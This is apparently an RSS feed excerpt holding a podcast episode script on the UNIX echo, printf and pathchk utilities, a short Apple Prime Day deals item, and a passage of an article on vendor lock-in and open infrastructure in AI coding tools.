As useful as <code>
echo</code>
 is, it should come as no surprise that it <a href="https://archive.org/details/a_research_unix_reader/page/n99/mode/1up" rel="noopener noreferrer" target="_blank">
first appeared early on in Bell Laboratories' Second Edition UNIX</a>

<sup>
1</sup>
 in 1972. This <a href="https://archive.org/details/a_research_unix_reader/page/n22/mode/1up" rel="noopener noreferrer" target="_blank">
initial version accepted no options</a>

<sup>
2</sup>
—although the manual page doesn't explicitly say output is followed by a newline character, the description of writing "as a line" seems to imply it. In <a href="https://man.cat-v.org/unix_7th/1/echo" rel="noopener noreferrer" target="_blank">
Seventh Edition UNIX, the manual page</a>

<sup>
3</sup>
 makes that clear, and also features the addition of the <code>
-n</code>
 option, which causes <code>
echo</code>
 to print the arguments <em>
without</em>
 a trailing newline character. <a href="https://man.cat-v.org/unix_8th/1/echo" rel="noopener noreferrer" target="_blank">
Eighth Edition UNIX's </a>

<code>

<a href="https://man.cat-v.org/unix_8th/1/echo" rel="noopener noreferrer" target="_blank">
echo</a>

</code>

<sup>
4</sup>
 gained the <code>
-e</code>
 option, which allows certain escape codes from the C programming language to be used.</p>

<p>
These variations caused differences in behavior between different versions of <code>
echo</code>
. Will running <code>
echo -n something</code>
 on your system output the text "something" without a newline, or "-n something" followed by a newline? Things get even trickier when the command arguments include parameter or pathname expansions. If there are files named "-n" and "something" in the current directory, what does <code>
echo *</code>
 output? Like the previous question, that depends on whether or not your version of <code>
echo</code>
 treats <code>
-n</code>
 as an option. You can't get around this ambiguity by quoting or escaping the "*", because that just causes <code>
echo</code>
 to print a literal asterisk.</p>

<p>

<em>
Example using GNU utilities on Debian 12; both the "echo" utility and the "echo" builtin of bash recognize "-n" as an option.</em>

</p>

<pre data-language="plain">
$ ls -1
-n
something
$ echo *
something$ #Shell prompt is on the same line because "-n" was treated as an option to echo
$ echo "*"
*
</pre>

<p>
The solution was to create a new utility, which is the first UNIX Curio for today: <code>
printf</code>
. This command allows a user to print text similar to the way the identically-named function works in the C programming language. You <a href="https://pubs.opengroup.org/onlinepubs/9699919799/utilities/printf.html" rel="noopener noreferrer" target="_blank">
run </a>

<code>

<a href="https://pubs.opengroup.org/onlinepubs/9699919799/utilities/printf.html" rel="noopener noreferrer" target="_blank">
printf</a>

</code>

<sup>
5</sup>
 followed by a format string, followed by zero or more arguments. No newline characters are printed unless specifically indicated by the format string or the arguments.</p>

<p>
To use <code>
printf</code>
 to print "something" without a newline, that would just be <code>
printf something</code>
. This demonstrates that you don't need any arguments—in this example, the format string is just a set of regular characters to be displayed. If you wanted a newline character at the end, <code>
printf "something\n"</code>
 would give you that. (In this case, the format string needs to be quoted so the "\n" isn't interpreted by the shell.) In addition to "\n" for a newline, you can also use "\a" for an alert (rings the terminal bell), "\b" for a backspace, "\f" for a formfeed, "\r" for a carriage return, "\t" for a horizontal tab, "\v" for a vertical tab, and "\\" to get a literal backslash. In addition to these special characters, any arbitrary byte can be included using a backslash followed by one to three octal digits; however, it might be difficult to predict what will be output because it can differ based on the character set the terminal is using. It is safer and more portable to stick to the pre-defined characters if possible.</p>

<p>
The <em>
real</em>
 magic of the <code>
printf</code>
 utility comes from using "conversion specifications" in the format string. Probably the simplest of these to explain is the "%s" conversion specification—it represents a string of any length. The command <code>
printf "Hi, %s, how are you?\n"</code>
 followed by a list of names would print the greeting for each name, putting it in the place occupied by the "%s".</p>

<pre data-language="plain">
$ printf "Hi, %s, how are you?\n" Alice Bob Carol
Hi, Alice, how are you?
Hi, Bob, how are you?
Hi, Carol, how are you?
</pre>

<p>
The format string is reused as many times as needed to consume all of the arguments. Take, for example, the command <code>
printf "Hi, %s, have you met %s?\n"</code>
. If this is run with two name arguments, it would print the sentence on one line, using both names. If run with four name arguments, it would print the sentence twice, once with the first two names and again with the second two names. If you only gave it three names, the last "%s" conversion specification would be replaced with a null string.</p>

<pre data-language="plain">
$ printf "Hi, %s, have you met %s?\n" Alice Bob
Hi, Alice, have you met Bob?
$ printf "Hi, %s, have you met %s?\n" Alice Bob Carol David
Hi, Alice, have you met Bob?
Hi, Carol, have you met David?
$ printf "Hi, %s, have you met %s?\n" Alice Bob Carol
Hi, Alice, have you met Bob?
Hi, Carol, have you met ?
</pre>

<p>
Three other items can also be given in each conversion specification: flags, the field width, and the precision. The exact meanings of these depend on which type of conversion specifier character you are using. For "%s", using a "-" as the flag causes the text to be left-justified instead of the default right-justified, a field width causes the printed field to be at least as long as the number given, and a precision limits the number of bytes written from the string to the number given.</p>

<pre data-language="plain">
$ #Example of %s with a precision value
$ printf "Hi, %.3s, how are you?\n" Alice Bob Carol
Hi, Ali, how are you?
Hi, Bob, how are you?
Hi, Car, how are you?
$ #Example of %s with a field width
$ printf "Hi, %8s, how are you?\n" Alice Bob Carol
Hi,    Alice, how are you?
Hi,      Bob, how are you?
Hi,    Carol, how are you?
$ #Example of %s with a left-justify flag and a field width
$ printf "Hi, %-8s, how are you?\n" Alice Bob Carol
Hi, Alice   , how are you?
Hi, Bob     , how are you?
Hi, Carol   , how are you?
$ #Example of %s with a left-justify flag, a field width, and a precision
$ printf "Hi, %-8.3s, how are you?\n" Alice Bob Carol
Hi, Ali     , how are you?
Hi, Bob     , how are you?
Hi, Car     , how are you?
</pre>

<p>
While "%s" is probably the most commonly-used conversion specification, others are available. A whole set of them are dedicated to printing integer values as a signed decimal, an unsigned decimal, an unsigned octal, or an unsigned hexadecimal number. These also can take flags, a field width, and a precision. I think the details and nuances of all this are too complex to clearly explain here, so I will just refer you to the <a href="https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap05.html" rel="noopener noreferrer" target="_blank">
POSIX "file format notation" specification</a>

<sup>
6</sup>
.</p>

<p>
Be aware that unlike the <code>
printf</code>
 function in the C programming language, the <code>
printf</code>
 utility is <em>
not</em>
 obligated to accept conversion specifications for floating-point numbers. While some implementations might support this, scripts intended to be portable should limit themselves to the restricted set required by the POSIX standard (%d, %i, %o, %u, %x, %X, %c, and %s, plus %b and %% described below).</p>

<p>
Two more conversion specifications are worth mentioning. The first is <em>
only</em>
 required by the standard for the <code>
printf</code>
 utility, not the C function, and is "%b". This is the same as "%s", except that certain backslash escape sequences in the argument will be treated specially. This includes all the ones described above <em>
except</em>
 for the one using octal digits to represent a byte. In an argument, this is instead represented by "\0" followed by one to three octal digits. An additional backslash escape sequence accepted is "\c"—this does not print anything itself, but causes <code>
printf</code>
 to immediately halt output.</p>

<p>
The final conversion specification is "%%", which just outputs a literal "%". You can't use a bare "%" in the format string, because <code>
printf</code>
 expects that to introduce a conversion specification. Be careful not to be tripped up by this when trying to print some value as a percentage.</p>

<p>

<em>
Example assuming that the hypothetical "/dev/batterycharge" file on your laptop outputs the battery charge level (42% in this case). As you can see, in some cases an error message might be displayed, but in others it might just behave in a way you didn't intend without complaining. GNU's "printf" utility and the "printf" builtin of bash both support "%e" as a conversion specification as an extension to POSIX.</em>

</p>

<pre data-language="plain">
$ cat /dev/batterycharge
42
$ #Wrong
$ printf "Your laptop's charge level is $(cat /dev/batterycharge)%.\n"
bash: printf: `\': invalid format character
Your laptop's charge level is 42$ #Shell prompt appears here from the error
$ #Right
$ printf "Your laptop's charge level is $(cat /dev/batterycharge)%%.\n"
Your laptop's charge level is 42%.
$ #Next one treats %e as the specifier, with the space and "l" as flags
$ printf "Your laptop has $(cat /dev/batterycharge)% level of charge.\n"
Your laptop has 42 0.000000e+00vel of charge.
$ #Because no arguments were given, "0" was used for the value to convert
</pre>

<p>
Let's go back to the situation I was describing with <code>
echo</code>
—we have files named "-n" and "something" in the current directory and want to print all their names, separated by spaces. We could do that with <code>
printf "%s " *</code>
, which would not treat the "-n" as an option. However, the output might look a little weird because there wouldn't be a newline character at the end. We could insert a newline by using "%b" instead of "%s" and following the asterisk with a "\n\c" as the second argument. The "\c" is there to prevent the final space in the format string from being printed after the newline.</p>

<pre data-language="plain">
$ ls -1
-n
something
$ printf "%s " *
-n something $ #No newline was printed here
$ printf "%b " * "\n"
-n something
 $ #There's a newline, but also a spurious space before the shell prompt
$ printf "%b " * "\n\c"
-n something
$ #No space before the shell prompt this time
</pre>

<p>
Using the "%b" conversion specification can therefore solve one problem, but it also introduces another. Arguments which include a backslash can be interpreted as escape sequences, and many systems are fine with allowing backslashes in filenames. In cases where you're just using the <code>
printf</code>
 utility to <em>
display</em>
 text, it's usually not a big deal if the output looks a little wonky. Where you really need to be careful is when the text is being piped to another program, as control characters and other oddities might cause unexpected results, and can potentially create security problems if processed by a script or utility running as a privileged user.</p>

<pre data-language="plain">
$ #GNU "ls" displays filenames containing a backslash in single quotes
$ ls -1
apple
banana
'\cherry'
durian
$ printf "%b " * "\n\c"
apple banana $ #"\c" in "\cherry" stops output immediately
</pre>

<p>
The <code>
printf</code>
 utility <a href="https://archive.org/details/a_research_unix_reader/page/n95/mode/1up" rel="noopener noreferrer" target="_blank">
looks to have shown up first in 1986's Ninth Edition UNIX</a>

<sup>
7</sup>
, though the <a href="https://man.cat-v.org/unix_10th/1/echo" rel="noopener noreferrer" target="_blank">
earliest manual page I could find</a>

<sup>
8</sup>
 is from the Tenth Edition. Its first appearance in BSD <a href="https://man.freebsd.org/cgi/man.cgi?query=printf&amp;sektion=1&amp;manpath=4.3BSD+Reno" rel="noopener noreferrer" target="_blank">
seems to be from 1990 in the 4.3 Reno release</a>

<sup>
9</sup>
. Two years later, it was added to Issue 4 of The Open Group's CAE Specification. From what I can tell, it did not seem to be in AT&amp;T's System III—presumably the <code>
printf</code>
 utility did make it into System V at some point but I found it difficult to track this down.</p>

<p>
While <code>
echo</code>
 is still suitable for use where you know for certain that you want a newline character printed at the end and none of the arguments will start with a hyphen, consider using the <code>
printf</code>
 utility instead for displaying text. It offers more flexibility and features than you are guaranteed to get with <code>
echo</code>
, although it does require a bit of forethought in constructing a proper format string and arguments. That is not necessarily a bad thing, because a script's author <em>
should</em>
 be thinking about what might happen if it is called with "strange" text or filenames.</p>

<p>
This episode also provides a good case for being careful when naming files—many filesystems will allow you to use hyphens, control characters, quotation marks, and potentially any character other than a slash or a null byte in a filename. As we've seen, some of these characters can create problems for standard utilities. While it can feel limiting, especially for people not using English, the safest filenames to use on a UNIX-like system consist only of characters in the <a href="https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap03.html#tag_03_282" rel="noopener noreferrer" target="_blank">
"portable filename character set" as defined by POSIX</a>

<sup>
10</sup>
 and where the first character is <em>
not</em>
 a hyphen. This set includes the lowercase and uppercase letters "a" through "z", the numerals "0" through "9", and the period, underscore, and hyphen. Notably, it does <em>
not</em>
 include the space character.</p>

<p>
That leads me to another UNIX Curio that I only just now discovered while researching this episode. This is <a href="https://pubs.opengroup.org/onlinepubs/9699919799/utilities/pathchk.html" rel="noopener noreferrer" target="_blank">
the </a>

<code>

<a href="https://pubs.opengroup.org/onlinepubs/9699919799/utilities/pathchk.html" rel="noopener noreferrer" target="_blank">
pathchk</a>

</code>

<a href="https://pubs.opengroup.org/onlinepubs/9699919799/utilities/pathchk.html" rel="noopener noreferrer" target="_blank">
 utility</a>

<sup>
11</sup>
. It can be run with one or more strings as arguments, checks each one against a set of rules for pathnames, and outputs an error message for each problem found. By default, it checks against the following limits on the system where it's being run: maximum number of bytes in the full path, maximum number of bytes in any component of the path, all byte sequences must be valid in the given directory, and the user running the program must have access to all directories referenced. If run with the <code>
-p</code>
 option, instead of those limits, it checks against POSIX limits: a maximum of 256 bytes in the full path, a maximum of 14 bytes in each component of the path, and each component must only include characters from the portable set. The <code>
-P</code>
 option adds warnings if any component starts with a "-" or if the pathname is completely empty. While the exit status will tell you if the checks succeeded or not, I don't feel like the <code>
pathchk</code>
 utility is well suited to be used in an automated fashion, as the exact wording of its output is not specified and checks cannot be selected individually. However, it can be used interactively to validate pathnames you aren't sure about. See the linked specification for full details.</p>

<p>
References:</p>

<ol>

<li>

<a href="https://archive.org/details/a_research_unix_reader/page/n99/mode/1up" rel="noopener noreferrer" target="_blank">
A Research UNIX Reader: Combined Tables of Contents</a>
 https://archive.org/details/a_research_unix_reader/page/n99/mode/1up</li>

<li>

<a href="https://archive.org/details/a_research_unix_reader/page/n22/mode/1up" rel="noopener noreferrer" target="_blank">
A Research UNIX Reader: Second Edition UNIX echo manual page</a>
 (although this page has "v1" typed at the top, the date and the tables of contents indicate it first appeared in v2, a.k.a. Second Edition) https://archive.org/details/a_research_unix_reader/page/n22/mode/1up</li>

<li>

<a href="https://man.cat-v.org/unix_7th/1/echo" rel="noopener noreferrer" target="_blank">
Seventh Edition UNIX echo manual page</a>
 https://man.cat-v.org/unix_7th/1/echo</li>

<li>

<a href="https://man.cat-v.org/unix_8th/1/echo" rel="noopener noreferrer" target="_blank">
Eighth Edition UNIX echo manual page</a>
 https://man.cat-v.org/unix_8th/1/echo</li>

<li>

<a href="https://pubs.opengroup.org/onlinepubs/9699919799/utilities/printf.html" rel="noopener noreferrer" target="_blank">
Printf specification</a>
 https://pubs.opengroup.org/onlinepubs/9699919799/utilities/printf.html</li>

<li>

<a href="https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap05.html" rel="noopener noreferrer" target="_blank">
File Format Notation specification</a>
 https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap05.html</li>

<li>

<a href="https://archive.org/details/a_research_unix_reader/page/n95/mode/1up" rel="noopener noreferrer" target="_blank">
A Research UNIX Reader: Ninth Edition Table of Contents</a>
 https://archive.org/details/a_research_unix_reader/page/n95/mode/1up</li>

<li>

<a href="https://man.cat-v.org/unix_10th/1/echo" rel="noopener noreferrer" target="_blank">
Tenth Edition UNIX echo/printf manual page</a>
 https://man.cat-v.org/unix_10th/1/echo</li>

<li>

<a href="https://man.freebsd.org/cgi/man.cgi?query=printf&amp;sektion=1&amp;manpath=4.3BSD+Reno" rel="noopener noreferrer" target="_blank">
4.3BSD Reno printf manual page</a>
 https://man.freebsd.org/cgi/man.cgi?query=printf&amp;sektion=1&amp;manpath=4.3BSD+Reno</li>

<li>

<a href="https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap03.html#tag_03_282" rel="noopener noreferrer" target="_blank">
Definitions: Portable Filename Character Set</a>
 https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap03.html#tag_03_282</li>

<li>

<a href="https://pubs.opengroup.org/onlinepubs/9699919799/utilities/pathchk.html" rel="noopener noreferrer" target="_blank">
Pathchk specification</a>
 https://pubs.opengroup.org/onlinepubs/9699919799/utilities/pathchk.html</li>

</ol>

<p>

</p>


<p><a href="https://hackerpublicradio.org/eps/hpr4667/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Best early Prime Day deals: $199 Apple Watch, $799 MacBook Air, Beats $89, AirTag 2 sale]]></title>
<description><![CDATA[Record-low prices have hit numerous Apple Watches, iPads, Macs, AirTags, and more as Amazon launches early Prime Day deals.Early Prime Day sales slash up to 50% off Apple products - Image credit: AppleFrom a record-breaking discount on the Apple Watch Ultra 3 at $150 off to a $799 MacBook Air and...]]></description>
<link>https://tsecurity.de/de/3615761/ios-mac-os/best-early-prime-day-deals-199-apple-watch-799-macbook-air-beats-89-airtag-2-sale/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615761/ios-mac-os/best-early-prime-day-deals-199-apple-watch-799-macbook-air-beats-89-airtag-2-sale/</guid>
<pubDate>Mon, 22 Jun 2026 16:22:57 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Record-low prices have hit numerous Apple Watches, iPads, Macs, AirTags, and more as Amazon launches early Prime Day deals.<br><br><div><img src="https://photos5.appleinsider.com/gallery/68007-143374-best-early-prime-day-apple-deals-2026-xl.jpg" alt="AppleInsider graphic showing Early Prime Day Apple Deals with AirPods, Apple Watch, MacBook Air, Magic Mouse, AirTags and a pink button reading Save up to 50% on a purple background" height="720"><br><span>Early Prime Day sales slash up to 50% off Apple products - Image credit: Apple</span></div><br>From a record-breaking discount on the Apple Watch Ultra 3 at $150 off to a $799 MacBook Air and new low price on AirTags 2, Amazon's early Prime Day Apple deals are plentiful.<br><br><a href="https://www.amazon.com/s?k=apple&amp;rh=p_n_deal_type:23566064011&amp;tag=apinsiderdeals-20" rel="nofollow" class="deal-highlight">Shop early Prime Day Apple deals</a><br><br><br> <a href="https://appleinsider.com/articles/26/06/22/best-early-prime-day-deals-199-apple-watch-799-macbook-air-beats-89-airtag-2-sale?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244721?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why open infrastructure will define the AI era]]></title>
<description><![CDATA[A new form of vendor lock-in is here. And it’s not proprietary languages or rigid enterprise software suites — it’s something more fundamental. It’s the very thing that writes the code.



JetBrains Research found that 74% of developers worldwide use AI tools. Claude Code, available only since Ma...]]></description>
<link>https://tsecurity.de/de/3614974/ai-nachrichten/why-open-infrastructure-will-define-the-ai-era/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614974/ai-nachrichten/why-open-infrastructure-will-define-the-ai-era/</guid>
<pubDate>Mon, 22 Jun 2026 11:19:12 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A new form of vendor lock-in is here. And it’s not proprietary languages or rigid enterprise software suites — it’s something more fundamental. It’s the very thing that writes the code.</p>



<p><a href="https://blog.jetbrains.com/research/2026/04/which-ai-coding-tools-do-developers-actually-use-at-work/">JetBrains Research</a> found that 74% of developers worldwide use AI tools. <a href="https://www.infoworld.com/article/4136718/claude-code-is-blowing-me-away.html">Claude Code</a>, available only since May 2025, is now the most popular AI coding tool, followed by <a href="https://www.infoworld.com/article/3829347/review-gemini-code-assist-is-good-at-coding.html">Gemini Code Assist</a> and <a href="https://www.infoworld.com/article/3609013/github-copilot-everything-you-need-to-know.html">GitHub Copilot</a>, according to Jellyfish’s 2026 <a href="https://jellyfish.co/resources/2026-state-of-engineering-management-report/">State of Engineering Management Report</a>.</p>



<p>The latter study also found that 91% of developers say their productivity has increased in the past 12 months. As coding output <a href="https://leaddev.com/ai/openai-says-there-are-easily-1000x-engineers-now">expectations are rewritten daily</a>, the engineering world is becoming heavily reliant on paid external AI services.</p>



<p><a href="https://www.linkedin.com/posts/markwoneill_how-to-optimize-token-consumption-for-ai-activity-7458329480994992128-AT9m?utm_source=share&amp;utm_medium=member_desktop&amp;rcm=ACoAAA-8zTABlsmtYe-zC-Uf5z3oD5nm6qXDVVo">Gartner predicts</a> that by 2028 spending on AI coding tokens could exceed developer salaries. Yet, <a href="https://www.infoworld.com/article/4183060/the-tokenmaxxing-backlash-is-coming.html">tokenmaxxing</a> while <a href="https://www.infoworld.com/article/4166817/vibe-coding-or-spec-driven-development-how-to-choose.html">vibe coding</a> through a vendor’s cloud-based API feels like a far cry from the open foundations of free programming languages and open models, which many of today’s AI platforms now abstract.</p>



<p>“Open infrastructure will be the backbone of the AI era,” says <a href="https://www.linkedin.com/in/farkasp/">Peter Farkas</a>, CEO of <a href="https://www.percona.com/">Percona</a>, a provider of open-source database solutions. “Right now, too many companies are building their entire AI strategy on top of proprietary platforms because the convenience is seductive.”</p>



<p>“It’s ‘three clicks’ to stand up a database or an AI service in a hyperscaler, and that convenience blinds people to the lock-in they’re signing up for,” he adds. “As AI workloads mature, organizations will realize that depending on one vendor for their data, models, runtime, and pricing is not a strategy.”</p>



<p><a href="https://www.infoworld.com/article/3973969/knowing-when-to-use-ai-coding-assistants.html">AI-assisted coding</a> is democratizing software engineering for non-engineers and <a href="https://leaddev.com/ai/ai-doesnt-create-great-developers-it-amplifies-them">accelerating top performers</a>. But if teams are always working within the confines of how one platform thinks the world should work, it could create locked-in toolsets at scale. And as <a href="https://techcrunch.com/2025/12/29/2025-was-the-year-ai-got-a-vibe-check/">AI platform costs rise</a>, a fundamental question arises: will software developers consume AI on their own terms, or on someone else’s?</p>



<p>There’s a strong case that the long-term winners in tech will be built on open-source standards and foundations, similar to the history of cloud-native computing and the internet itself.</p>



<p>“Open always wins,” says <a href="https://www.linkedin.com/in/brianalvey/">Brian Alvey</a>, CTO at <a href="https://wpvip.com/">WordPress VIP</a>, a managed WordPress hosting platform. “Not because it’s a fancy ideology, but because it gives you total freedom to adapt, evolve, and stay in control.”</p>



<p>Open infrastructure avoids a future where developers perpetually rent. “For AI to be useful to people at large, it can’t be something you’re paying rent for the rest of your life,” says <a href="https://www.linkedin.com/in/maniksurtani/">Manik Surtani</a>, CTO and co-founder of the <a href="https://aaif.io/">Agentic AI Foundation</a> (AAIF), a vendor-neutral home for open-source agentic AI technologies. “And it can’t be concentrated in one particular corporation or a small handful of corporations, because we know how that goes.”</p>



<h2 class="wp-block-heading">Pricey, closed, proprietary AI</h2>



<p>AI development today is traveling two parallel paths. On one path, <a href="https://leaddev.com/technical-direction/be-careful-open-source-ai">open-source AI</a> is thriving and fueling tremendous growth in the number and variety of AI models and tools. Just take the thousands of open-weight models on <a href="https://huggingface.co/">HuggingFace</a>, the community around the <a href="https://openclaw.ai/">OpenClaw</a> AI agent, or the many academic institutions publishing <a href="https://thenewstack.io/llms-can-now-trace-their-outputs-to-specific-training-data/">new breakthroughs</a>.</p>



<p>“Open-source models and tooling are hot on the heels of state-of-the-art, with interesting and boundary-pushing work being shared by labs and researchers across the world,” says Austin Parker, director of AI strategy at <a href="https://www.honeycomb.io/">Honeycomb</a>, an observability platform provider, citing frontier open-source models like <a href="https://mistral.ai/">Mistral</a>, <a href="https://github.com/deepseek-ai/deepseek-v3">DeepSeek</a>, and <a href="https://allenai.org/olmo2">Ai2’s OLMo</a> as examples.</p>



<p>Others agree. “There’s unprecedented openness at the model and tooling layer, with open-source models, frameworks, and orchestration advancing at remarkable speed,” says <a href="https://www.linkedin.com/in/markcollier/">Mark Collier</a>, general manager of AI and infrastructure at the <a href="https://www.linuxfoundation.org/">Linux Foundation</a>.</p>



<p>On the other path, we’re seeing heavy reliance on proprietary AI systems controlled by Anthropic, Cursor, Google, Microsoft, OpenAI, and others. As Collier says, “Many platforms are wrapping those open components in closed, opinionated interfaces that trade short-term speed for long-term constraints.”</p>



<p><a href="https://www.infoworld.com/article/2262355/what-is-open-source-software-open-source-and-foss-explained.html">Open source</a> and the AI tooling market don’t always mix well. LangChain’s <a href="https://github.com/langchain-ai/open-agent-platform">Open Agent Platform</a>, for instance, was open-sourced to much fanfare in 2025, but by 2026 had been deprecated, with the repository now recommending fully managed alternatives.</p>



<p>For <a href="https://www.linkedin.com/in/shaposhnik/">Roman Shaposhnik</a>, co-founder and CTO of <a href="https://nekko.ai/">Ainekko</a>, provider of an open-source, composable AI stack, the current AI platform landscape is reminiscent of <a href="https://devops.com/demystifying-the-low-code-category/">low-code and no-code platforms</a>, which promised democratization of software development but often <a href="https://www.infoworld.com/article/3958483/7-reasons-low-code-and-no-code-tools-fail-to-deliver.html">failed to deliver</a>, becoming synonymous with platform lock-in and inflexibility.</p>



<p>“Honestly, it feels familiar,” Shaposhnik says. “We have incredibly powerful AI tools right now, but most of them come bundled as tightly controlled platforms.” This is a risk for AI, he says, because the infrastructure, models, and hardware are tightly coupled. “If those layers are closed, you lose flexibility fast.”</p>



<p>Some abstractions that sit on top of models, like routing and agent frameworks, tend to be tightly coupled and optimized for certain models. Other platforms take the walled garden concept quite literally. Anthropic, for instance, has repeatedly made headlines for blocking access to its Claude models over <a href="https://www.tomshardware.com/tech-industry/artificial-intelligence/anthropic-nuked-a-companys-access-to-claude-stopping-60-employees-dead-in-their-tracks-support-via-google-form-is-the-only-recourse-for-vague-usage-policy-violation">vague policy violations</a>. The company recently shut off <a href="https://venturebeat.com/technology/anthropic-cracks-down-on-unauthorized-claude-usage-by-third-party-harnesses">competitor xAI’s use</a> and <a href="https://thenewstack.io/anthropic-agent-sdk-confusion/">stonewalled OpenCode</a>, drawing community backlash.</p>



<p>Moves toward increasingly closed systems don’t bode well for an AI economy already built on shaky economics. As <a href="https://www.linkedin.com/in/vikramsrivats/">Vikram Srivats</a>, head of product experience at <a href="https://www.wavemaker.com/">WaveMaker</a>, provider of an agentic application development platform, adds, “Given the unit economics of AI tooling and pace of accelerated change to keep up, it seems obvious that some will evolve to more of a closed system to be able to monetize and gain ROI.”</p>



<h2 class="wp-block-heading">Why openness matters in the AI era</h2>



<p>Reliance on proprietary AI platforms can create long-term operational dependencies. As systems become less interoperable, organizations may be forced to standardize on a single stack across data pipelines, models, and decision logic, says the Linux Foundation’s Collier.</p>



<p>“As infrastructure consolidates, enterprises become more exposed when platforms change direction, raise prices, or fall behind technically,” he says. “If you can’t change platforms without re-architecting your AI systems, you’ve already given up too much control.”</p>



<p>“When you build on someone else’s platform, you have to live by their rules and those rules always change,” adds WordPress VIP’s Alvey. “We’ve all seen this before, businesses wasting time and money building to serve Google, Facebook, YouTube, and the App Store, instead of building to serve their customers.”</p>



<p><a href="https://www.infoworld.com/article/2337012/get-used-to-cloud-vendor-lock-in.html">Platform lock-in</a> can also create direct business risk. As Ainekko’s Shaposhnik says, “It usually shows up as higher costs, fragile systems, and growing risk when it’s time to change direction.”</p>



<p>At Ainekko, an internal group called the <a href="https://www.eejournal.com/article/do-you-want-to-be-an-ai-plumber/">AI Plumbers</a> focuses on back-end AI infrastructure like inference, scheduling, memory, and hardware integration. “Their view is simple,” says Shaposhnik. “If those layers are closed, everything above them becomes fragile.”</p>



<p>Open standards, interfaces, and infrastructure provide a necessary hedge against closed systems to prevent this sort of fragility. “In the AI era, open infrastructure gives enterprises control, portability, and choice at exactly the time they need it most,” says Percona’s Farkas.</p>



<p>It can cost upwards of $100,000 to migrate enterprise software, <a href="https://cloudaware.com/blog/cloud-migration-costs/">according to Cloudaware</a>, making portability a major enterprise concern. From this perspective, procuring closed systems can become a costly architectural dependency.</p>



<p>Others argue that openness is a critical hedge against vendor concentration risks at large, especially if AI replaces human labor en masse. “If all of that economic value is now being concentrated in the hands of one or two companies,” says the AAIF’s Surtani, “that’s an order of magnitude bigger problem than we’ve seen in any other wave of computing.”</p>



<p>Instead, open foundations allow adaptability to evolving conditions so enterprises can swap out models, agents, data, hardware, and orchestration, as needed. “Open standards let those components change independently without breaking the system,” says Collier. </p>



<p>Openness can also help future-proof businesses against economic upheaval. “Open everything will help build a cushion for businesses and users to survive and thrive after the almost-certain correction in the current hype cycle,” says WaveMaker’s Srivats.</p>



<h2 class="wp-block-heading">Momentum toward open AI infrastructure</h2>



<p>At the industry level, momentum toward open AI infrastructure is growing. The <a href="https://www.linuxfoundation.org/press/linux-foundation-announces-the-formation-of-the-agentic-ai-foundation">establishment</a> of the <a href="https://aaif.io/author/aaif/">Agentic AI Foundation</a>, Anthropic’s donation of <a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">Model Context Protocol</a> (MCP), and Block’s donation of its <a href="https://aaif.io/projects/goose/">Goose agent</a> are significant ecosystem-wide moves toward openness. Other advances include the donation of <a href="https://thenewstack.io/llm-d-cncf-kubernetes-inference/">llm-d</a>, a <a href="https://www.infoworld.com/article/2266945/what-is-kubernetes-scalable-cloud-native-applications.html">Kubernetes</a> framework for LLM inference, to the Cloud Native Computing Foundation (CNCF).</p>



<p>For Parker, donations like this help ensure long-term support and care. “Open standards aren’t just the foundation of the internet, they’re the foundation of the AI space,” he says. “I predict that we’ll see these practices continue, especially as enterprise adoption increases in earnest,” he adds.</p>



<p>Still, some question whether this level of stewardship is enough for a rapidly evolving ecosystem. “The internet benefited early on from groups that helped keep vendors aligned,” says Shaposhnik. “In AI infrastructure, we don’t really have that yet.”</p>



<p>“All of us open source veterans are hopeful,” he says, “but we also need to adapt to this new reality in what we do regarding AI infrastructure.”</p>



<p>Beyond industry governing bodies, companies themselves are also spearheading open AI initiatives. Warp, an agentic development environment, recently <a href="https://thenewstack.io/warp-open-source-client/">went open source</a> amid closed-source rivals. Arcade.dev, meanwhile, is pushing an open-source <a href="https://www.arcade.dev/blog/agent-library/">Agent Library</a> for agentic memory.</p>



<h2 class="wp-block-heading">Where openness matters most in the AI stack</h2>



<p>While AI infrastructure can be open in many ways, a few layers stand out as especially important. First is the openness of the model itself. “Open-source models must be the foundation of future trust and value,” says WaveMaker’s Srivats.</p>



<p>“The forms of open infrastructure that reduce integration friction and accelerate adoption stand out,” adds <a href="https://www.linkedin.com/in/neeraj-abhyankar-9040141/">Neeraj Abhyankar</a>, VP of data and AI at <a href="https://www.rsystems.com/">R Systems</a>, a global digital solutions provider. For him, open model representation formats, open orchestration and execution layers, open agentic protocols, and open governance and metadata standards are all essential for enterprise flexibility.</p>



<p>Others place more value on the connective tissue between AI components. “The most important forms of open infrastructure are the ones that connect systems together,” says Collier. “That includes open APIs, metadata standards, identity and policy frameworks, and protocols for how models and agents communicate.” </p>



<p>Arguably, <a href="https://www.infoworld.com/article/4096223/10-mcp-servers-for-devops.html">MCP</a> has become the connective tissue between AI agents and the <a href="https://thenewstack.io/how-to-prepare-your-api-for-ai-agents/">broader API ecosystem</a>. “If we get MCP right we unlock the same level of interoperability between entities on the web and models driving them as we came to enjoy during the Web 2.0 era and the API-first boom,” says Shaposhnik. “If we don’t we risk massive proprietary lock-ins.”</p>



